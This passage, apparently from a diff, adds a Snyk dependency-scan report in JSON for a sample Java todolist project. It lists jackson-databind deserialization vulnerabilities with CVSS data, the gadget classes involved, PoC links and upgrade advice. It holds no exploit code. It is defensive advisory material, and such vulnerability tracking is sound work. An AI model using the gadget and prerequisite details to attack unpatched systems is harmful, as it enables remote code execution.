"level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:31Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.582959Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2662", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.826605Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-rf6r-2c4q-2vwg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T17:09:01.709397Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:20Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:20Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.576513Z", + "socialTrendAlert": false, + 
"severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2670", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-11113", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "cvssSources": [ + { + "type": 
"primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:21.749219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11113" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9vvp-fxw6-jcxr" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T08:36:41.369827Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.400473Z", + "socialTrendAlert": false, + "severityWithCritical": 
"high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2664", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": 
"high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.628835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11111" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-v3xw-c963-f5hc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:28:18.821103Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.145935Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", + "title": "GItHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2666", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:03.656527Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11112" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-58pp-9c76-5625" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:29:29.728517Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.113524Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2682", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", 
